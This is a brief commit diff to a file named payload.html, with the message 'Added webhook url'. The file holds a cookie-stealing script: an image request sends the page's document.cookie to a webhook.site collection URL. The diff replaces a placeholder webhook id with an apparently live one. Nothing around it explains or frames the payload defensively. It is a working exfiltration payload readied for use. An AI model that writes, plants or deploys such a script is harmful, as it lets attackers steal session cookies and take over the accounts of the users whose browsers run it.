Added webhook url

--- a/payload.html
+++ b/payload.html
@@ -2,7 +2,7 @@
 <html>
   <body>
     <script>
-      new Image().src = "https://webhook.site/abcd1234?c=" + encodeURIComponent(document.cookie);
+      new Image().src = "https://webhook.site/1bd2ff9e-8fde-40e4-a1e0-e1d27bf0e087?c=" + encodeURIComponent(document.cookie);
     </script>
   </body>
 </html>
